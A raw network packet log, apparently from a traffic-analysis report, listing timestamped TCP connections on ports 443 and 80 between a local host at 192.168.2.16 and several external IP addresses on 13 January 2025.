                                                                  Jan 13, 2025 22:37:23.631320953 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718246937 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718275070 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718302965 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718322992 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718339920 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718369007 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718369961 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.718441010 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.718477964 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.718477964 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.718808889 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.719413042 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.719429016 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.728404045 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.728801012 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.728820086 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.729695082 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.729784966 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.730967999 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.731004953 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.731175900 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.736881018 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.737128973 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.737135887 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.737456083 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.737991095 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.738032103 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.738099098 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.738147020 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.738163948 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.771331072 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.773153067 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.773194075 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.773214102 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.773217916 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812371969 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812396049 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812457085 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.812467098 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812526941 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812553883 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.812658072 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812700987 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812722921 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812740088 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812863111 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.812863111 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.812931061 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.812989950 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.813474894 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813530922 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813560009 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813579082 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813594103 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813602924 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.813622952 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.813647985 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.813669920 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.814466000 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.814496040 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.814516068 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.814542055 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.814568043 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.814583063 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.814613104 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.815287113 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.815301895 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.815417051 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.815429926 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.815499067 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.817154884 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.821185112 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.854033947 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.854098082 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.854176998 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.854383945 CET49740443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.854392052 CET4434974035.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.855082035 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.855101109 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.855197906 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.855556011 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:23.855567932 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:23.869177103 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.902759075 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.902793884 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.902812958 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.902832031 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.902851105 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.902993917 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.902995110 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903064013 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903110981 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903132915 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903146029 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903161049 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903188944 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903193951 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903244972 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903258085 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903317928 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903609991 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903641939 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903692007 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903691053 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903702974 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.903731108 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.903755903 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.904531956 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904561043 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904598951 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.904612064 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904639959 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.904683113 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904702902 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904721022 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904748917 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.904761076 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.904791117 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.904820919 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.905515909 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.905575037 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.905585051 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.905595064 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.905626059 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.905646086 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.977564096 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977593899 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977673054 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977720976 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.977730989 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977740049 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977785110 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.977837086 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977875948 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.977881908 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977916002 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977936983 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977962017 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.977973938 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.977978945 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.978009939 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.978775978 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.978842974 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:23.982238054 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.993143082 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.993298054 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.993334055 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.993347883 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.993391991 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:23.993407011 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.993407011 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.993490934 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.993597984 CET49739443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:23.993640900 CET44349739104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.029145956 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.065758944 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065792084 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065856934 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.065861940 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065906048 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065931082 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065948963 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.065969944 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.065975904 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066015005 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.066018105 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066349983 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.066746950 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066775084 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066795111 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066812992 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066818953 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.066824913 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066865921 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.066869974 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.066926003 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.067661047 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068334103 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068351030 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068371058 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068387985 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068398952 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.068403959 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068432093 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.068451881 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.068454981 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.068996906 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.069060087 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.069063902 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.109492064 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.109496117 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156713009 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156739950 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156770945 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.156774998 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156827927 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.156831980 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156836987 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156868935 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156874895 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.156883955 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.156925917 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.156939983 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157298088 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157320023 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157352924 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.157361031 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157388926 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157442093 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.157793045 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157836914 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157854080 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.157865047 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.157888889 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.157917976 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.159228086 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.159281969 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.159328938 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.159383059 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.159677029 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.159701109 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.159729004 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.159734011 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.159785986 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.161781073 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.161840916 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.201762915 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.201826096 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.205147028 CET4968080192.168.2.16192.229.211.108
                                                                  Jan 13, 2025 22:37:24.247513056 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247587919 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.247668982 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247719049 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.247786999 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247824907 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.247840881 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247889042 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.247909069 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247957945 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.247977018 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248003006 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248049974 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248054981 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248094082 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248189926 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248234034 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248235941 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248261929 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248284101 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248301983 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248451948 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248488903 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248503923 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248507023 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248532057 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248543978 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248547077 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248588085 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248626947 CET44349741104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.248635054 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.248666048 CET49741443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.251790047 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.251885891 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.251980066 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.252284050 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.252320051 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.332221031 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.332526922 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:24.332546949 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.332873106 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.333209038 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:24.333264112 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.333369017 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:24.379326105 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.466460943 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.466533899 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.466579914 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:24.466804981 CET49742443192.168.2.1635.190.80.1
                                                                  Jan 13, 2025 22:37:24.466815948 CET4434974235.190.80.1192.168.2.16
                                                                  Jan 13, 2025 22:37:24.534384966 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.534442902 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.534516096 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.534754992 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.534774065 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.716325998 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.716744900 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.716809034 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.717323065 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.717609882 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.717701912 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.717747927 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.759331942 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.766259909 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.860810995 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.860882044 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.861051083 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.861665010 CET49744443192.168.2.16104.18.95.41
                                                                  Jan 13, 2025 22:37:24.861706972 CET44349744104.18.95.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.994281054 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.994534016 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.994549990 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.994808912 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.995157003 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:24.995209932 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:24.995331049 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.039331913 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.146389961 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.146481037 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.146542072 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.146550894 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.146595001 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.147074938 CET49745443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.147088051 CET44349745104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.153366089 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.153409958 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.153497934 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.153719902 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.153738976 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.420701027 CET4968080192.168.2.16192.229.211.108
                                                                  Jan 13, 2025 22:37:25.626960039 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.627397060 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.627456903 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.627764940 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.628083944 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.628146887 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.628360987 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.671366930 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.776160002 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.776333094 CET44349746104.18.94.41192.168.2.16
                                                                  Jan 13, 2025 22:37:25.776410103 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.776932001 CET49746443192.168.2.16104.18.94.41
                                                                  Jan 13, 2025 22:37:25.776962042 CET44349746104.18.94.41192.168.2.16
